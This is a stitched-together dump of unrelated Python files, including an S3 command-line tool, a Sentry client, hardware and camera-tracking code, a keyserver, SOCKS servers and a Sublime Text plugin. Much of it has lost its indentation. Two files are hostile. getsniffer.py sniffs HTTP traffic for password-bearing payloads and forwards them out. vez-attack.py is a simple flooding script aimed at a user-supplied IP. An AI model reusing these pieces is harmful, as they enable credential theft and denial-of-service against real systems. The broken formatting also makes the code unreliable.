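            # op has the same contract as op_list_prefix et al: list in, list out
            result_q.put((idx, op([item])[0]))

    procs = [Process(target=_worker, args=(tasks, results)) for _ in range(n)]
    for p in procs:
        p.start()
    out = [None] * len(lst)
    for _ in range(len(lst)):
        idx, res = results.get()
        out[idx] = res
    for p in procs:
        p.join()
    return out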
# CLI
@click.group()
def cli():
pass
@cli.command("list", help="List S3 objects")
@click.option(
"--inputs",
type=click.Path(exists=True),
help="Read input prefixes from the given file.",
)
@click.option(
"--num-workers",
default=NUM_WORKERS_DEFAULT,
show_default=True,
help="Number of concurrent connections.",
)
@click.option(
"--recursive/--no-recursive",
default=False,
show_default=True,
help="Download prefixes recursively.",
)
@click.argument("prefixes", nargs=-1)
def lst(prefixes, inputs=None, num_workers=None, recursive=None):
urllist = []
for prefix, _ in _populate_prefixes(prefixes, inputs):
src = urlparse(prefix)
url = S3Url(
url=prefix,
bucket=src.netloc,
path=src.path.lstrip("/"),
local=None,
prefix=prefix,
)
if src.scheme != "s3":
exit(ERROR_INVALID_URL, url)
urllist.append(url)
op = op_list_prefix if recursive else op_list_prefix_nonrecursive
urls = []
for success, prefix_url, ret in parallel_op(op, urllist, num_workers):
if success:
urls.extend(ret)
else:
exit(ret, prefix_url)
for url, size in urls:
if size is None:
print(format_triplet(url.prefix, url.url))
else:
print(format_triplet(url.prefix, url.url, str(size)))
@cli.command(help="Upload files to S3")
@click.option(
"--file",
"files",
type=(click.Path(exists=True), str),
multiple=True,
help="Local file->S3Url pair to upload. " "Can be specified multiple times.",
)
@click.option(
"--filelist",
type=click.Path(exists=True),
help="Read local file -> S3 URL mappings from the given file.",
)
@click.option(
"--num-workers",
default=NUM_WORKERS_DEFAULT,
show_default=True,
help="Number of concurrent connections.",
)
@click.option(
"--verbose/--no-verbose",
default=True,
show_default=True,
help="Print status information on stderr.",
)
@click.option(
"--overwrite/--no-overwrite",
default=True,
show_default=True,
help="Overwrite key if it already exists in S3.",
)
@click.option(
"--listing/--no-listing",
default=False,
show_default=True,
help="Print S3 URLs upload to on stdout.",
)
def put(
files=None,
filelist=None,
num_workers=None,
verbose=None,
overwrite=True,
listing=None,
):
def _files():
for local, url in files:
yield url_unquote(local), url_unquote(url), None, None
if filelist:
for line in open(filelist, mode="rb"):
r = json.loads(line)
local = r["local"]
url = r["url"]
content_type = r.get("content_type", None)
metadata = r.get("metadata", None)
if not os.path.exists(local):
exit(ERROR_LOCAL_FILE_NOT_FOUND, local)
yield local, url, content_type, metadata
def _make_url(local, user_url, content_type, metadata):
src = urlparse(user_url)
url = S3Url(
url=user_url,
bucket=src.netloc,
path=src.path.lstrip("/"),
local=local,
prefix=None,
content_type=content_type,
metadata=metadata,
)
if src.scheme != "s3":
exit(ERROR_INVALID_URL, url)
if not src.path:
exit(ERROR_NOT_FULL_PATH, url)
return url
urls = list(starmap(_make_url, _files()))
ul_op = "upload"
if not overwrite:
ul_op = "info_upload"
sz_results = process_urls(ul_op, urls, verbose, num_workers)
urls = [url for url, sz in zip(urls, sz_results) if sz is not None]
if listing:
for url in urls:
print(format_triplet(url.url))
def _populate_prefixes(prefixes, inputs):
# Returns a tuple: first element is the prefix and second element
# is the optional range (or None if the entire prefix is requested)
if prefixes:
prefixes = [(url_unquote(p), None) for p in prefixes]
else:
prefixes = []
if inputs:
with open(inputs, mode="rb") as f:
for l in f:
s = l.split(b" ")
if len(s) > 1:
prefixes.append(
(url_unquote(s[0].strip()), url_unquote(s[1].strip()))
)
else:
prefixes.append((url_unquote(s[0].strip()), None))
return prefixes
@cli.command(help="Download files from S3")
@click.option(
"--recursive/--no-recursive",
default=False,
show_default=True,
help="Download prefixes recursively.",
)
@click.option(
"--num-workers",
default=NUM_WORKERS_DEFAULT,
show_default=True,
help="Number of concurrent connections.",
)
@click.option(
"--inputs",
type=click.Path(exists=True),
help="Read input prefixes from the given file.",
)
@click.option(
"--verify/--no-verify",
default=True,
show_default=True,
help="Verify that files were loaded correctly.",
)
@click.option(
"--info/--no-info",
default=True,
show_default=True,
help="Return user tags and content-type",
)
@click.option(
"--allow-missing/--no-allow-missing",
default=False,
show_default=True,
help="Do not exit if missing files are detected. " "Implies --verify.",
)
@click.option(
"--verbose/--no-verbose",
default=True,
show_default=True,
help="Print status information on stderr.",
)
@click.option(
"--listing/--no-listing",
default=False,
show_default=True,
help="Print S3 URL -> local file mapping on stdout.",
)
@click.argument("prefixes", nargs=-1)
def get(
prefixes,
recursive=None,
num_workers=None,
inputs=None,
verify=None,
info=None,
allow_missing=None,
verbose=None,
listing=None,
):
# Construct a list of URL (prefix) objects
urllist = []
for prefix, r in _populate_prefixes(prefixes, inputs):
src = urlparse(prefix)
url = S3Url(
url=prefix,
bucket=src.netloc,
path=src.path.lstrip("/"),
local=generate_local_path(prefix),
prefix=prefix,
range=r,
)
if src.scheme != "s3":
exit(ERROR_INVALID_URL, url)
if not recursive and not src.path:
exit(ERROR_NOT_FULL_PATH, url)
urllist.append(url)
# Construct a url->size mapping and get content-type and metadata if needed
op = None
dl_op = "download"
if recursive:
op = op_list_prefix
if verify or verbose or info:
dl_op = "info_download"
if op:
urls = []
# NOTE - we must retain the order of prefixes requested
# and the listing order returned by S3
for success, prefix_url, ret in parallel_op(op, urllist, num_workers):
if success:
urls.extend(ret)
elif ret == ERROR_URL_NOT_FOUND and allow_missing:
urls.append((prefix_url, None))
else:
exit(ret, prefix_url)
else:
# pretend zero size since we don't need it for anything.
# it can't be None though, to make sure the listing below
# works correctly (None denotes a missing file)
urls = [(prefix_url, 0) for prefix_url in urllist]
# exclude the non-existent files from loading
to_load = [url for url, size in urls if size is not None]
sz_results = process_urls(dl_op, to_load, verbose, num_workers)
# We check if there is any access denied
is_denied = [sz == -ERROR_URL_ACCESS_DENIED for sz in sz_results]
if any(is_denied):
# Find the first one to return that as an error
for i, b in enumerate(is_denied):
if b:
exit(ERROR_URL_ACCESS_DENIED, to_load[i])
if not allow_missing:
is_missing = [sz == -ERROR_URL_NOT_FOUND for sz in sz_results]
if any(is_missing):
# Find the first one to return that as an error
for i, b in enumerate(is_missing):
if b:
exit(ERROR_URL_NOT_FOUND, to_load[i])
# Postprocess
if verify:
# Verify only results with an actual size (so actual files)
verify_results(
[
(url, sz)
for url, sz in zip(to_load, sz_results)
if sz != -ERROR_URL_NOT_FOUND
],
verbose=verbose,
)
idx_in_sz = 0
if listing:
for url, _ in urls:
sz = None
if idx_in_sz != len(to_load) and url.url == to_load[idx_in_sz].url:
sz = sz_results[idx_in_sz] if sz_results[idx_in_sz] >= 0 else None
idx_in_sz += 1
if sz is None:
# This means that either the initial url had a None size or
# that after loading, we found a None size
print(format_triplet(url.url))
else:
print(format_triplet(url.prefix, url.url, url.local))
@cli.command(help="Get info about files from S3")
@click.option(
"--num-workers",
default=NUM_WORKERS_DEFAULT,
show_default=True,
help="Number of concurrent connections.",
)
@click.option(
"--inputs",
type=click.Path(exists=True),
help="Read input prefixes from the given file.",
)
@click.option(
"--verbose/--no-verbose",
default=True,
show_default=True,
help="Print status information on stderr.",
)
@click.option(
"--listing/--no-listing",
default=False,
show_default=True,
help="Print S3 URL -> local file mapping on stdout.",
)
@click.argument("prefixes", nargs=-1)
def info(prefixes, num_workers=None, inputs=None, verbose=None, listing=None):
# Construct a list of URL (prefix) objects
urllist = []
for prefix, _ in _populate_prefixes(prefixes, inputs):
src = urlparse(prefix)
url = S3Url(
url=prefix,
bucket=src.netloc,
path=src.path.lstrip("/"),
local=generate_local_path(prefix, suffix="info"),
prefix=prefix,
range=None,
)
if src.scheme != "s3":
exit(ERROR_INVALID_URL, url)
urllist.append(url)
process_urls("info", urllist, verbose, num_workers)
if listing:
for url in urllist:
print(format_triplet(url.prefix, url.url, url.local))
if __name__ == "__main__":
cli(auto_envvar_prefix="S3OP")
|
async.py
|
"""
sentry.client.async
~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from queue import Queue
from sentry.client.base import SentryClient
from threading import Thread, Lock
import atexit
from sentry.client.models import get_client
import os
import time
SENTRY_WAIT_SECONDS = 10
class AsyncSentryClient(SentryClient):
"""This client uses a single background thread to dispatch errors."""
_terminator = object()
def __init__(self):
"""Starts the task thread."""
self.queue = Queue(-1)
self._lock = Lock()
self._thread = None
self.start()
def start(self):
self._lock.acquire()
try:
if not self._thread:
self._thread = Thread(target=self._target)
self._thread.setDaemon(True)
self._thread.start()
finally:
self._lock.release()
atexit.register(main_thread_terminated)
def stop(self, timeout=None):
"""Stops the task thread. Synchronous!"""
self._lock.acquire()
try:
if self._thread:
self.queue.put_nowait(self._terminator)
self._thread.join(timeout=timeout)
self._thread = None
finally:
self._lock.release()
def _target(self):
while True:
record = self.queue.get()
if record is self._terminator:
break
self.send_sync(**record)
def send_sync(self, **kwargs):
super(AsyncSentryClient, self).send(**kwargs)
def send(self, **kwargs):
self.queue.put_nowait(kwargs)
def main_thread_terminated():
client = get_client()
if isinstance(client, AsyncSentryClient):
size = client.queue.qsize()
if size:
print("Sentry attempts to send %s error messages" % size)
print("Waiting up to %s seconds" % SENTRY_WAIT_SECONDS)
if os.name == 'nt':
print("Press Ctrl-Break to quit")
else:
print("Press Ctrl-C to quit")
client.stop(timeout = SENTRY_WAIT_SECONDS)
|
buzzer.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import threading
import time
from cisco_deviot.thing import Action, Property
from cisco_grovepi.senor import Sensor
class Buzzer(Sensor):
ON = 1
OFF = 0
def __init__(self, tid, name, pin):
Sensor.__init__(self, tid, name, pin, "buzzer")
self.add_action(Action("turn_on"))
self.add_action(Action("turn_off"))
self.add_action(Action("beep").
add_parameter(Property(name="duration", value=10, range=[10, 100])).
add_parameter(Property(name="interval", value=1, range=[1, 10])))
self.working_thread = None
def turn_on(self):
Sensor.digital_write(self, Buzzer.ON)
def turn_off(self):
Sensor.digital_write(self, Buzzer.OFF)
def beep(self, duration, interval):
if self.working_thread is None:
self.working_thread = threading.Thread(target=Buzzer.__working_function, args=(self, duration, interval))
self.working_thread.daemon = True
self.working_thread.start()
def __working_function(self, duration, interval):
while duration > 0:
self.turn_on()
time.sleep(interval)
duration -= interval
self.turn_off()
time.sleep(interval)
duration -= interval
self.working_thread = None
|
server.py
|
# A dead-simple keyserver implementation in python.
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import *
from Crypto.Cipher import AES
from Crypto.Util import Counter
from enum import Enum
import secrets
import operator
import urllib.parse
import threading
import random
import shutil
import base64
import time
import csv
class settings():
caseid_len = 7 # how many characters long a tek is
caseid_purge_age = 14 # how long caseids last
tek_life = 14 # how long a tek lasts (how many the server should expect)
packed_tek_len = 20 # how long a packed tek is in bytes (4 bytes epoch, 16 bytes tek)
def get_epoch() -> int:
"""gets the unix epoch time"""
return int(time.time())
def derive_enin(epoch : int):
"""gets an enin given an epoch"""
return epoch // (60 * 10)
def unpack_tek(tek : bytes) -> Tuple[int, str]:
"""splits a datapair into an epoch and tek string. can be used for storage."""
return derive_enin(int.from_bytes(tek[:4], "little")), base64.b64encode(tek[4:settings.packed_tek_len]).decode("utf-8")
def pack_tek(epoch : int, tek : str) -> bytes:
"""turns a tek tuple into its binary representation"""
return epoch.to_bytes(4, "little") + base64.b64decode(tek)
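# Illustrative round trip (defined for clarity, never called by the server code):
# pack_tek() stores a 4-byte little-endian epoch followed by the 16 raw TEK bytes
# (settings.packed_tek_len == 20), and unpack_tek() returns the ENIN derived from
# that epoch together with the base64-encoded TEK.
def _tek_roundtrip_demo():
    epoch = get_epoch()
    tek_b64 = base64.b64encode(secrets.token_bytes(16)).decode("utf-8")
    packed = pack_tek(epoch, tek_b64)
    enin, tek_again = unpack_tek(packed)
    assert enin == derive_enin(epoch) and tek_again == tek_b64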
def commit_teks(teks : Iterable[Tuple[int, str]]):
"""appends an iterable of teks to the tekfile."""
global tek_file_path
with open(tek_file_path, "a") as tek_file:
tek_file.writelines(map("%d,%s\n".__mod__, teks))
def random_bytes(num : int) -> bytes:
"""generates random bytes of length num"""
return bytes(random.getrandbits(8) for _ in range(num))
class CaseIDType(Enum):
NOT_FOUND = 0
VALID = 1
TOO_OLD = 2
def get_caseids() -> Set[Tuple[int, str]]:
"""returns a set of all caseids"""
return set(iter_caseids())
def commit_caseids(caseids : Set[Tuple[int, str]]):
"""updates caseids"""
global caseid_file_path
with open(caseid_file_path, "w") as caseid_file:
caseid_file.writelines(map("%d,%s\n".__mod__, caseids))
def iter_caseids() -> Iterable[Tuple[int, str]]:
"""iterates over the caseid file"""
global caseid_file_path
caseid_file = open(caseid_file_path, "r")
for line in caseid_file:
row = line.split(",")
yield (int(row[0]), row[1].rstrip())
def burn_caseid(test_caseid: str, caseid_array: Set[Tuple[int, str]]) -> Tuple[CaseIDType, Tuple[int, str]]:
"""validates a caseid against a caseid array. if the caseid is valid, it will return a tuple containing the matching caseid."""
min_age = get_epoch() - settings.caseid_purge_age * 24 * 60 * 60
for epoch, caseid in caseid_array:
if caseid.casefold() == test_caseid.casefold():
if epoch > min_age:
return CaseIDType.VALID, (epoch, caseid)
else:
return CaseIDType.TOO_OLD, (epoch, caseid)
return CaseIDType.NOT_FOUND, None
def gen_caseid(epoch: int, caseid_array: Set[Tuple[int, str]]) -> str:
"""randomly generates a 7-character case id and adds it to the caseid array"""
data = base64.b32encode(secrets.token_bytes(4)).decode("utf-8")[:7]
caseid_array.add((epoch, data))
return data
class TracerServerHandler(BaseHTTPRequestHandler):
def send_headers(self, code : int = 200, headers : dict = { "Content-Type" : "text/html" }) -> None:
"""sends a response code and a dictionary of headers"""
self.send_response(code)
for key, value in headers.items():
self.send_header(key, value)
self.end_headers()
def get_query(self, default : dict = {}) -> dict:
"""gets the query string as a dictionary"""
return dict([*default.items()] + [*urllib.parse.parse_qs(urllib.parse.urlparse(self.path).query, False).items()])
def do_GET(self):
"""returns all of the valid binary TEKs"""
global tek_file_path
self.send_headers()
query = self.get_query({
"oldest" : [0]
})
oldest_age = int(query["oldest"][0])
with open(tek_file_path, "r") as tek_file:
tek_reader = csv.reader(tek_file)
for row in tek_reader:
epoch = int(row[0])
if epoch >= oldest_age:
self.wfile.write(pack_tek(epoch, row[1]))
def do_POST(self):
"""accepts a body consisting of a CaseID and 14 binary TEKs and saves them to a pending TEK array if the CaseID is valid."""
global active_caseid_array, pending_teks
self.send_headers()
content_len = int(self.headers["Content-Length"])
content_len -= settings.caseid_len
if content_len // settings.packed_tek_len == settings.tek_life:
caseid = self.rfile.read(settings.caseid_len).decode("utf-8")
ret, match_caseid = burn_caseid(caseid, active_caseid_array)
if ret == CaseIDType.VALID:
active_caseid_array.remove(match_caseid)
for i in range(settings.tek_life):
chunk = self.rfile.read(settings.packed_tek_len)
if not chunk: break
tek = unpack_tek(chunk)
if tek[0]: pending_teks.append(tek)
self.wfile.write(b"ok")
return
elif ret == CaseIDType.TOO_OLD:
self.wfile.write(b"expired")
return
self.wfile.write(b"invalid")
def log_message(self, format, *args):
return
tek_file_path = "tekfile.csv"
caseid_file_path = "caseid.csv"
active_caseid_array = get_caseids()
pending_teks = []
http_server = HTTPServer(("", 80), TracerServerHandler)
server_thread = threading.Thread(target=http_server.serve_forever, name="tracer webserver")
server_thread.setDaemon(True)
server_thread.start()
def reload_changes():
global pending_teks, active_caseid_array, sync_thread
commit_teks(pending_teks)
pending_teks.clear()
commit_caseids(active_caseid_array)
    sync_thread = threading.Timer(sync_thread.interval, sync_thread.function)
    sync_thread.daemon = True
    sync_thread.start()
sync_thread = threading.Timer(5.0, reload_changes)
sync_thread.daemon = True
sync_thread.start()
def shutdown(cmd):
    global http_server, sync_thread
    http_server.shutdown()
    sync_thread.cancel()
    raise SystemExit
def reload_caseid_array() -> int:
global active_caseid_array
active_caseid_array = get_caseids()
return len(active_caseid_array)
def commit_pending_teks(cmd):
global pending_teks
commit_teks(pending_teks)
out = "commited %d teks" % len(pending_teks)
pending_teks.clear()
return out
command_list = {
"gen_caseid": lambda cmd: "\n".join("%d: generated key %s" % (i, gen_caseid(get_epoch(), active_caseid_array)) for i in range(int(cmd[1]) if cmd[1:] else 1)),
"list_caseid": lambda cmd: "\n".join(map("epoch: %d\tcaseid: %s".__mod__, active_caseid_array)),
"get_caseid": lambda cmd: reload_caseid_array(),
"commit_caseid": lambda cmd: commit_caseids(active_caseid_array),
"commit_teks": commit_pending_teks,
"list_teks": lambda cmd: "\n".join(map("epoch: %d\ttek: %s".__mod__, pending_teks)),
"help": lambda cmd: "available commands:\n\t"+"\n\t".join(command_list.keys()),
"exit": shutdown
}
while True:
userin = input("> ")
parsedcmd = userin.split()
command = parsedcmd[0] if parsedcmd else "help"
if command in command_list:
print(command_list[command](parsedcmd))
else: print("unknown command!")
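# Example client request (a sketch, not part of the original file; the host below is a
# placeholder for wherever this module is deployed, and the server listens on port 80):
#   import urllib.request
#   packed = urllib.request.urlopen("http://localhost/?oldest=0").read()
#   # the response body is a concatenation of settings.packed_tek_len-byte TEK records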
|
getsniffer.py
|
from scapy.all import *
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import re
from base64 import b64decode
from threading import Thread
from time import sleep
from random import randint
import time
import utils
def packet_callback(packet):
global BUFFER
pkt = str(packet[TCP].payload)
if packet[IP].dport == 80:
if str(bytes(packet[TCP].payload)) == "":
pass
else:
if "password" in str(bytes(packet[TCP].payload)):
sleep(2)
now = time.strftime("%c")
utils.send_output("{{getrequestauth}}" + str(bytes(packet[TCP].payload)) + "{{{" + str(time.strftime("%c")))
def start_sniffer():
sniff(filter="tcp", prn=packet_callback, store=0)
def run():
thread0 = Thread(target = start_sniffer)
thread0.start()
|
servers.py
|
import ssl
import socket
import threading
try:
import socketserver
except ImportError:
import SocketServer as socketserver
try:
from queue import Queue
except ImportError:
from Queue import Queue
socketserver.TCPServer.allow_reuse_address = True
TIME_OUT = 30
POOL_SIZE = 50
class ThreadPoolMixIn(socketserver.ThreadingMixIn):
"""Thread pool mixin"""
def serve_forever(self, pool_size=POOL_SIZE):
self.requests = Queue(pool_size)
for x in range(pool_size):
t = threading.Thread(target = self.process_request_thread)
t.setDaemon(1)
t.start()
while True:
self.handle_request()
self.server_close()
def process_request_thread(self):
while True:
socketserver.ThreadingMixIn.process_request_thread(self, *self.requests.get())
def handle_request(self):
try:
request, client_address = self.get_request()
except socket.error:
return
if self.verify_request(request, client_address):
self.requests.put((request, client_address))
class SecureTCPServer(socketserver.TCPServer):
"""TCP server with SSL"""
SYSTEMD_FIRST_SOCKET_FD = 3
def __init__(self, pem_path, server_address, handler_class, with_systemd=False):
socketserver.BaseServer.__init__(self, server_address, handler_class)
af, socktype, proto, canonname, sa = socket.getaddrinfo(
self.server_address[0], self.server_address[1], 0, socket.SOCK_STREAM)[0]
if not with_systemd:
sock = socket.socket(af, socktype, proto)
else:
sock = socket.fromfd(self.SYSTEMD_FIRST_SOCKET_FD, af, socktype)
#sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(TIME_OUT)
# Don't do handshake on connect for ssl (which will block http://bugs.python.org/issue1251)
self.socket = ssl.wrap_socket(sock, pem_path, pem_path, server_side=True, do_handshake_on_connect=False)
if not with_systemd:
self.server_bind()
self.server_activate()
class Socks5Server(socketserver.ThreadingMixIn, socketserver.TCPServer):
"""Threading Socks5 server"""
pass
class TPSocks5Server(ThreadPoolMixIn, socketserver.TCPServer):
"""Thread Pool Socks5 server"""
pass
class SecureSocks5Server(socketserver.ThreadingMixIn, SecureTCPServer):
"""Secure Socks5 server"""
pass
class TPSecureSocks5Server(ThreadPoolMixIn, SecureTCPServer):
"""Thread Pool Secure Socks5 server"""
pass
class PingServer(ThreadPoolMixIn, socketserver.UDPServer):
"""UDP Ping server"""
pass
class DNSServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
"""UDP DNS Proxy"""
pass
class RPCServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
"""UDP RPC Server"""
pass
# Test server
# svr = PingServer(('0.0.0.0', 8888), PingHandler)
# svr.serve_forever(5)
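# A TLS-wrapped variant could be started in the same way (sketch; "server.pem" and
# Socks5Handler are placeholders that are not defined in this module):
# svr = SecureSocks5Server('server.pem', ('0.0.0.0', 1080), Socks5Handler)
# svr.serve_forever()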
|
manager.py
|
import logging
from multiprocessing import Value, Process, Manager
import time
import pantilthat as pth
import signal
import sys
import numpy as np
from rpi_deep_pantilt.detect.camera import PiCameraStream
from rpi_deep_pantilt.detect.ssd_mobilenet_v3_coco import SSDMobileNet_V3_Small_Coco_PostProcessed, SSDMobileNet_V3_Coco_EdgeTPU_Quant
from rpi_deep_pantilt.control.pid import PIDController
logging.basicConfig()
LOGLEVEL = logging.getLogger().getEffectiveLevel()
RESOLUTION = (320, 320)
SERVO_MIN = -90
SERVO_MAX = 90
CENTER = (
RESOLUTION[0] // 2,
RESOLUTION[1] // 2
)
# function to handle keyboard interrupt
def signal_handler(sig, frame):
# print a status message
print("[INFO] You pressed `ctrl + c`! Exiting...")
# disable the servos
pth.servo_enable(1, False)
pth.servo_enable(2, False)
# exit
sys.exit()
def run_detect(center_x, center_y, labels, edge_tpu):
if edge_tpu:
model = SSDMobileNet_V3_Coco_EdgeTPU_Quant()
else:
model = SSDMobileNet_V3_Small_Coco_PostProcessed()
capture_manager = PiCameraStream(resolution=RESOLUTION)
capture_manager.start()
capture_manager.start_overlay()
label_idxs = model.label_to_category_index(labels)
start_time = time.time()
fps_counter = 0
while not capture_manager.stopped:
if capture_manager.frame is not None:
frame = capture_manager.read()
prediction = model.predict(frame)
if not len(prediction.get('detection_boxes')):
continue
if any(item in label_idxs for item in prediction.get('detection_classes')):
tracked = (
(i, x) for i, x in
enumerate(prediction.get('detection_classes'))
if x in label_idxs
)
tracked_idxs, tracked_classes = zip(*tracked)
track_target = prediction.get('detection_boxes')[
tracked_idxs[0]]
# [ymin, xmin, ymax, xmax]
y = int(
RESOLUTION[1] - ((np.take(track_target, [0, 2])).mean() * RESOLUTION[1]))
center_y.value = y
x = int(
RESOLUTION[0] - ((np.take(track_target, [1, 3])).mean() * RESOLUTION[0]))
center_x.value = x
display_name = model.category_index[tracked_classes[0]]['name']
logging.info(
f'Tracking {display_name} center_x {x} center_y {y}')
overlay = model.create_overlay(frame, prediction)
capture_manager.overlay_buff = overlay
            if LOGLEVEL == logging.DEBUG and (time.time() - start_time) > 1:
fps_counter += 1
fps = fps_counter / (time.time() - start_time)
logging.debug(f'FPS: {fps}')
fps_counter = 0
start_time = time.time()
def in_range(val, start, end):
    # determine whether the input value is within the supplied range
    return start <= val <= end
def set_servos(pan, tilt):
# signal trap to handle keyboard interrupt
signal.signal(signal.SIGINT, signal_handler)
while True:
pan_angle = -1 * pan.value
tilt_angle = tilt.value
# if the pan angle is within the range, pan
if in_range(pan_angle, SERVO_MIN, SERVO_MAX):
pth.pan(pan_angle)
else:
logging.info(f'pan_angle not in range {pan_angle}')
if in_range(tilt_angle, SERVO_MIN, SERVO_MAX):
pth.tilt(tilt_angle)
else:
logging.info(f'tilt_angle not in range {tilt_angle}')
def pid_process(output, p, i, d, box_coord, origin_coord, action):
# signal trap to handle keyboard interrupt
signal.signal(signal.SIGINT, signal_handler)
# create a PID and initialize it
p = PIDController(p.value, i.value, d.value)
p.reset()
# loop indefinitely
while True:
error = origin_coord - box_coord.value
output.value = p.update(error)
# logging.info(f'{action} error {error} angle: {output.value}')
# ('person',)
#('orange', 'apple', 'sports ball')
def pantilt_process_manager(
edge_tpu=False,
labels=('person',)
):
pth.servo_enable(1, True)
pth.servo_enable(2, True)
with Manager() as manager:
# set initial bounding box (x, y)-coordinates to center of frame
center_x = manager.Value('i', 0)
center_y = manager.Value('i', 0)
center_x.value = RESOLUTION[0] // 2
center_y.value = RESOLUTION[1] // 2
# pan and tilt angles updated by independent PID processes
pan = manager.Value('i', 0)
tilt = manager.Value('i', 0)
# PID gains for panning
pan_p = manager.Value('f', 0.05)
# 0 time integral gain until inferencing is faster than ~50ms
pan_i = manager.Value('f', 0.1)
pan_d = manager.Value('f', 0)
# PID gains for tilting
tilt_p = manager.Value('f', 0.15)
# 0 time integral gain until inferencing is faster than ~50ms
tilt_i = manager.Value('f', 0.2)
tilt_d = manager.Value('f', 0)
        detect_process = Process(target=run_detect,
                                 args=(center_x, center_y, labels, edge_tpu))
pan_process = Process(target=pid_process,
args=(pan, pan_p, pan_i, pan_d, center_x, CENTER[0], 'pan'))
tilt_process = Process(target=pid_process,
args=(tilt, tilt_p, tilt_i, tilt_d, center_y, CENTER[1], 'tilt'))
servo_process = Process(target=set_servos, args=(pan, tilt))
        detect_process.start()
pan_process.start()
tilt_process.start()
servo_process.start()
        detect_process.join()
pan_process.join()
tilt_process.join()
servo_process.join()
if __name__ == '__main__':
pantilt_process_manager()
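# Sketch: labels accepts any tuple of COCO class names, e.g. the commented sets above:
# pantilt_process_manager(labels=('orange', 'apple', 'sports ball'))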
|
vez-attack.py
|
import time as v
import socket
import threading
print "\n"*1000
v.sleep(2)
print """ \033[1;36;50m
__ __ _____ _____ _ _____ _____ _ ____ _ __
\ \ / / | ____| |__ / / \ |_ _| |_ _| / \ / ___| | |/ /
\ \ / / | _| / / / _ \ | | | | / _ \ | | | ' /
\ V / | |___ / /_ / ___ \ | | | | / ___ \ | |___ | . \
\_/ |_____| /____| /_/ \_\ |_| |_| /_/ \_\ \____| |_|\_\
"""
v.sleep(1.5)
print """By VipRs ______ >>Python2.7
|______| """
v.sleep(1)
target =raw_input("Ip>>")
port = 80
print "port 80..."
v.sleep(2)
def xxx():
x = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
x.connect((target, port))
x.sendto(("GET /{target} HTTP/1.1\rboot off da skid :v\n").encode("ascii"), (target, port))
x.close()
ix = 0
while ix != 100:
v.sleep(0.5)
thread = threading.Thread(target=xxx)
thread.start()
print "Socket Sent!"
|
main.py
|
import sublime
import sublime_plugin
import webbrowser
import urllib
import re
import os
import sys
import shutil
import zipfile
import json
import pprint
import time
import xml
import urllib.request
from . import requests
from . import processor
from . import context
from . import util
from .salesforce.lib import xmlformatter
from .salesforce.lib.jsontoapex import JSONConverter
from .salesforce.lib.panel import Printer
from .salesforce import xmltodict
from .salesforce import message
class RemoveComments(sublime_plugin.TextCommand):
def run(self, edit):
comments = self.view.find_by_selector('comment')
for region in reversed(comments):
region = self.view.full_line(region)
self.view.erase(edit, region)
class Haoku(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(Haoku, self).__init__(*args, **kwargs)
def run(self, router=""):
settings = context.get_settings()
session = util.get_session_info(settings)
if not session:
Printer.get("error").write("Please Login Firstly")
return
heroku_host = "https://haoku.herokuapp.com"
# heroku_host = "http://localhost:3000"
show_params = {
"accessToken": session["session_id"],
"instanceUrl": session["instance_url"],
"username": settings["username"],
"router": router
}
show_params = urllib.parse.urlencode(show_params)
open_url = heroku_host + '?%s' % show_params
util.open_with_browser(open_url)
class BaseSelection(object):
def is_enabled(self):
if not self.view.size(): return False
self.selection = self.view.substr(self.view.sel()[0])
self.choose_all = False
if not self.selection:
self.choose_all = True
self.selection = self.view.substr(sublime.Region(0,
self.view.size()))
return True
class BuildCustomLabelsMetadata(sublime_plugin.TextCommand):
def run(self, edit):
try:
file_name = self.view.file_name()
lables_metadata = util.build_metadata(file_name, {
"root": "CustomLabels",
"leaf": "labels",
"xmlNodes": [
"shortDescription", "fullName",
"categories", "protected",
"language", "value"
]
})
formatter = xmlformatter.Formatter(indent=4)
lables_metadata = formatter.format_string(lables_metadata)
except ValueError as ve:
return Printer.get('error').write(str(ve))
view = sublime.active_window().new_file()
view.set_syntax_file("Packages/XML/XML.tmLanguage")
view.run_command("new_view", {
"name": "CustomLabels.labels",
"input": lables_metadata.decode("utf-8")
})
class BuildCustomLabelsTranslationMetadata(sublime_plugin.TextCommand):
def run(self, edit):
try:
file_name = self.view.file_name()
translations = util.build_metadata(file_name, {
"root": "Translations",
"leaf": "customLabels",
"xmlNodes": ["name", "label"]
})
formatter = xmlformatter.Formatter(indent=4)
translations = formatter.format_string(translations)
        except ValueError as ve:
            return Printer.get('error').write(str(ve))
view = sublime.active_window().new_file()
view.set_syntax_file("Packages/XML/XML.tmLanguage")
view.run_command("new_view", {
"name": "Translations.translation",
"input": translations.decode("utf-8")
})
class JsonFormat(BaseSelection, sublime_plugin.TextCommand):
def run(self, edit):
try:
formatted_json = json.dumps(json.loads(self.selection),
ensure_ascii=False, indent=4)
except ValueError as ve:
return Printer.get('error').write(str(ve))
if not self.choose_all:
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": "FormattedJSON",
"input": formatted_json
})
else:
self.view.window().run_command("new_dynamic_view", {
"view_id": self.view.id(),
"view_name": self.view.name(),
"point": 0,
"erase_all": True,
"input": formatted_json
})
class JsonSerialization(BaseSelection, sublime_plugin.TextCommand):
def run(self, edit):
try:
self.data = json.loads(self.selection)
except ValueError as ve:
return Printer.get('error').write(str(ve))
if not self.choose_all:
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": "SerializedJSON",
"input": json.dumps(self.data)
})
else:
self.view.window().run_command("new_dynamic_view", {
"view_id": self.view.id(),
"view_name": self.view.name(),
"point": 0,
"erase_all": True,
"input": json.dumps(self.data)
})
class JsonToApex(BaseSelection, sublime_plugin.TextCommand):
def run(self, edit):
try:
self.data = json.loads(self.selection)
except ValueError as ve:
return Printer.get('error').write(str(ve))
